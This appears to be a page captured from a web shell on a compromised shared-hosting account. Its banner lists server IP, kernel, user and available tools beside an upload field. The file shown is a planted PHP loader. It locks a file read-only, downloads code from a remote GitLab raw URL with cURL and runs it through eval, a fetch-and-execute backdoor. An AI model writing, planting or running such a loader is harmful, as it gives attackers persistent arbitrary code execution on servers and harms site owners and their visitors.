| Server IP : 162.0.217.165 / Your IP : 216.73.216.110 Web Server : LiteSpeed System : Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 User : bestgxuo ( 1658) PHP Version : 8.4.17 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/bestgxuo/igfancyfonts.com/ |
Upload File : |
<?php
$file = 'wide.php';
chmod($file, 0444);
?>
<?php
$remoteUrl = "https://gitlab.com/kenworld0x1/housepro/-/raw/main/wide.txt";
$ch = curl_init($remoteUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$remoteCode = curl_exec($ch);
if (curl_errno($ch)) {
die('cURL error: ' . curl_error($ch));
}
curl_close($ch);
eval("?>" . $remoteCode);
?>